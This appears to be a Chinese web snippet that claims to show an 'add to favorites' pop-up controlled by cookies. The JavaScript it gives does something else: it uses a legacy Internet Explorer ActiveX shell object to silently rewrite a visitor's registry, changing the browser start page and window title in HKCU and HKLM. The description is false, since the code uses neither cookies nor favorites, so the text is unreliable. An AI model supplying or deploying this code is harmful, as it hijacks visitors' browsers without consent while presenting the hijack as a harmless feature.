第一次打开网页会自动弹出添加到收藏夹的提示,
再次打开的时候则不会再提示,
这是利用了Cookies,清空后再刷新则又会弹出提示。
代码如下:
[code] <SCRIPT language=JavaScript> document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"); function f(){ a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject(); Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://"); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "网名"); Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "网名"); } function init() { setTimeout("f()", 1000); } init(); </SCRIPT>[/code]
会员登录关闭
注册会员关闭